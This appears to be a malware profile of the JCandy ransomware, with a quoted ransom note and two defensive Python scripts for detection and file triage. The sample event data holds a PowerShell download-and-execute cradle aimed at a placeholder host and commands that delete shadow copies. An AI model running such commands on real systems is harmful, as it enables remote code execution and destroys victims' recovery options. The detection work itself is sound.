
JCandy Ransomware

By GoldSparrow in Ransomware

The JCandy Ransomware is an encryption ransomware Trojan that was first observed on November 13, 2017. The JCandy Ransomware appears to be the product of an independent group of cybercrooks rather than a member of a larger ransomware family or a RaaS (Ransomware as a Service) offering. The JCandy Ransomware may be delivered to victims through spam email attachments, often disguised as messages from legitimate senders and taking the form of Microsoft Word documents with malicious macro scripts that download and install the JCandy Ransomware onto the victim's computer. The main purpose of ransomware Trojans like the JCandy Ransomware is to force computer users to pay ransoms. To do this, the JCandy Ransomware takes the victim's files hostage by encrypting them with a strong encryption algorithm. The JCandy Ransomware also disables alternate file recovery methods, for example by deleting the Shadow Volume Copies of the victim's files. Unfortunately, once the JCandy Ransomware has encrypted the victim's files, there is currently no way to restore them without the decryption software and key, which the cybercrooks hold.
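Two of the behaviours described above leave traces in endpoint process-creation telemetry: a Microsoft Office application spawning a script host (macro-based delivery) and the deletion of Shadow Volume Copies. The script below is an added example, not code from this article or from the JCandy sample itself. It runs two detection rules over constructed Sysmon-style process-creation lines. The vssadmin and wmic command patterns are generic shadow-copy deletion commands used by many ransomware families; the article does not state which command JCandy runs, and "sample.exe" is a placeholder name for the unnamed JCandy binary.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation events in a Sysmon-like key=value layout.
# These are illustrative, not telemetry captured from a JCandy infection;
# "sample.exe" is a placeholder because the article does not name the binary.
SAMPLE_EVENTS = [
    'ts=2017-11-13T10:01:58Z host=WS01 parent=explorer.exe image=WINWORD.EXE cmdline="WINWORD.EXE /n invoice.docm"',
    'ts=2017-11-13T10:02:03Z host=WS01 parent=WINWORD.EXE image=powershell.exe cmdline="powershell.exe -w hidden -c IEX((New-Object Net.WebClient).DownloadString(\'http://example.invalid/p\'))"',
    'ts=2017-11-13T10:02:11Z host=WS01 parent=sample.exe image=vssadmin.exe cmdline="vssadmin.exe Delete Shadows /All /Quiet"',
    'ts=2017-11-13T10:02:12Z host=WS01 parent=sample.exe image=wmic.exe cmdline="wmic shadowcopy delete"',
    'ts=2017-11-13T10:05:00Z host=WS02 parent=services.exe image=vssadmin.exe cmdline="vssadmin.exe List Shadows"',
    'ts=2017-11-13T10:06:30Z host=WS02 parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"',
]

EVENT_RE = re.compile(
    r'^ts=(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"$'
)

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Generic shadow-copy deletion commands (vssadmin / wmic). The article only
# says that JCandy deletes Shadow Volume Copies; the exact command is not given.
SHADOW_DELETE_RULES = [
    ("vssadmin.exe", re.compile(r"delete\s+shadows", re.I)),
    ("wmic.exe", re.compile(r"shadowcopy\s+delete", re.I)),
]


@dataclass
class Alert:
    rule: str
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> Optional[dict]:
    """Return the event fields as a dict, or None for a line that does not parse."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def detect(lines) -> List[Alert]:
    """Apply both rules to every event and return the alerts raised."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue  # malformed line: skip it rather than abort the whole run
        parent = ev["parent"].lower()
        image = ev["image"].lower()
        cmd = ev["cmdline"]
        # Rule 1: an Office application spawning a script host (macro delivery).
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            alerts.append(Alert("office_spawns_script_host", ev["ts"], ev["host"],
                                ev["parent"], ev["image"], cmd))
        # Rule 2: shadow copy deletion (recovery inhibition). "List Shadows" does not match.
        for img, pattern in SHADOW_DELETE_RULES:
            if image == img and pattern.search(cmd):
                alerts.append(Alert("shadow_copy_deletion", ev["ts"], ev["host"],
                                    ev["parent"], ev["image"], cmd))
    return alerts


def summarize(alerts: List[Alert]) -> dict:
    """Count alerts per rule name."""
    counts = {}
    for a in alerts:
        counts[a.rule] = counts.get(a.rule, 0) + 1
    return counts


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.rule}] {a.ts} {a.host} {a.parent} -> {a.image}: {a.cmdline}")
    print(summarize(found))
```

On the constructed sample this raises three alerts, all on host WS01: one for WINWORD.EXE launching powershell.exe and two for the shadow copy deletions. The benign "vssadmin.exe List Shadows" on WS02 is not flagged, which is the distinction a production rule must keep, since administrators run vssadmin legitimately.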

How the JCandy Ransomware Takes the Victim's Files Hostage

The JCandy Ransomware takes the victim's files hostage by encrypting them with the AES-256 encryption algorithm. The JCandy Ransomware marks the files compromised by its attack by appending the file extension '.locked-jCandy' to each affected file's name. Once the JCandy Ransomware encrypts the files, they are no longer readable and show up as blank icons on the infected computer, since the appended extension is not associated with any installed application. The JCandy Ransomware stores the decryption key on its Command and Control servers, out of reach of the victim, security software and analysts. Without the decryption key, the files encrypted by the JCandy Ransomware attack are not recoverable and have effectively been taken hostage.

The JCandy Ransomware and Its Ransom Demand

The JCandy Ransomware delivers a program window named 'jCandy' on the infected computer after encrypting the victim's files. The JCandy Ransomware's program window contains the JCandy Ransomware's ransom note, which reads as follows:

'jCandy
YOUR FILES HAVE BEEN LOCKED
We have encrypted ALL your important files!
We have NOT deleted ANY files. Your files have been LOCKED!
If you would like access to your files you will need to purchase $200 USD worth of BITCOIN and have it sent to this bitcoin address below.
After the payment is received your files will be decrypted and this program will delete itself.
You have 48 hours to send the payment and have your files unlocked.
If you fail to do so, your files will be DELETED
~ Kind Regards, jCandy
SEND PAYMENT TO [12pFSG5hxcbdV33JmcSnEnFXr1woFYTeew] [Copy|BUTTON] [Unlock my files|BUTTON] [BUY BITCOIN]'

The JCandy Ransomware demands a ransom payment of 200 USD, to be paid in Bitcoin because Bitcoin payments are pseudonymous and hard to trace back to the cybercrooks. The JCandy Ransomware encrypts user-generated files, in particular those with the following file extensions:

.txt, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .xml, .psd, .zip, .rar.
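Because the JCandy Ransomware appends '.locked-jCandy' to the original file name rather than replacing the extension, an incident responder can recover every original name (and so the list of files to restore from backup) from the marker alone. The script below is an added example written for this article, not code from the page or from the malware. It walks a directory, recovers the original names and extensions of marked files, checks them against the extension list above, and measures byte entropy as a sanity check that the content really is ciphertext. The sample directory tree is constructed inside the script with random bytes standing in for AES-256 ciphertext.

```python
import math
import os
import tempfile
from collections import Counter
from pathlib import Path
from typing import Dict, List

# Extensions the article lists as targeted by the JCandy Ransomware.
TARGETED_EXTENSIONS = {
    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg",
    ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html",
    ".xml", ".psd", ".zip", ".rar",
}
MARKER = ".locked-jCandy"      # extension appended to every encrypted file
ENTROPY_THRESHOLD = 7.5        # bits per byte; ciphertext sits close to 8.0
ALREADY_COMPRESSED = {".jpg", ".png", ".zip", ".rar"}  # high entropy even when clean


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 0.0 for empty or single-valued input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(root: str) -> List[Dict]:
    """Find marker-extension files, recover the original name and judge
    whether the content looks like ciphertext."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or not path.name.endswith(MARKER):
            continue
        original = path.name[: -len(MARKER)]
        ext = Path(original).suffix.lower()
        entropy = shannon_entropy(path.read_bytes()[:65536])  # sample the first 64 KiB
        findings.append({
            "path": str(path),
            "original_name": original,
            "extension": ext,
            "targeted_extension": ext in TARGETED_EXTENSIONS,
            "entropy": round(entropy, 3),
            "looks_encrypted": entropy > ENTROPY_THRESHOLD,
            # Compressed formats cannot be told apart from ciphertext by entropy alone.
            "entropy_inconclusive": ext in ALREADY_COMPRESSED,
        })
    return findings


def summarize_triage(findings: List[Dict]) -> Dict[str, int]:
    """Headline counts for the incident record."""
    return {
        "marked_files": len(findings),
        "targeted_extension": sum(f["targeted_extension"] for f in findings),
        "looks_encrypted": sum(f["looks_encrypted"] for f in findings),
    }


def build_sample_tree() -> str:
    """Constructed directory tree standing in for a victim's Documents folder."""
    root = tempfile.mkdtemp(prefix="jcandy_triage_")
    docs = Path(root) / "Documents"
    docs.mkdir()
    # Random bytes stand in for AES-256 ciphertext.
    (docs / ("invoice.docx" + MARKER)).write_bytes(os.urandom(4096))
    (docs / ("photo.jpg" + MARKER)).write_bytes(os.urandom(4096))
    # Marker extension but zero-filled content: not ciphertext, worth a second look.
    (docs / ("decoy.log" + MARKER)).write_bytes(b"\x00" * 4096)
    # Untouched files.
    (docs / "notes.txt").write_text("meeting notes\n")
    (docs / "readme.md").write_text("# readme\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    results = triage(sample_root)
    for f in results:
        print(f)
    print(summarize_triage(results))
```

The entropy check matters for two reasons: a file that carries the marker but is not high-entropy (the zero-filled decoy in the sample) was not encrypted by a working AES routine and may be recoverable or may be a planted file, while already-compressed formats such as .jpg or .zip are flagged as inconclusive because they read as near-random whether or not they were encrypted.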

Since the JCandy Ransomware works by restricting the victims' access to their files, the best protection against ransomware Trojans like the JCandy Ransomware is to keep file backups. Because the JCandy Ransomware deletes the Shadow Volume Copies on the infected machine, those backups must be stored where the infection cannot reach them, such as offline or on separate media; with such backups in place, the cybercrooks' approach becomes completely ineffective. Combining file backups with a reliable security program is the best way to ensure that your data is safe from threats such as the JCandy Ransomware. This is especially true as ransomware Trojans like the JCandy Ransomware become more popular and account for an increasingly large share of the threat landscape and of the Trojan ecosystem used to carry out attacks on computer users.
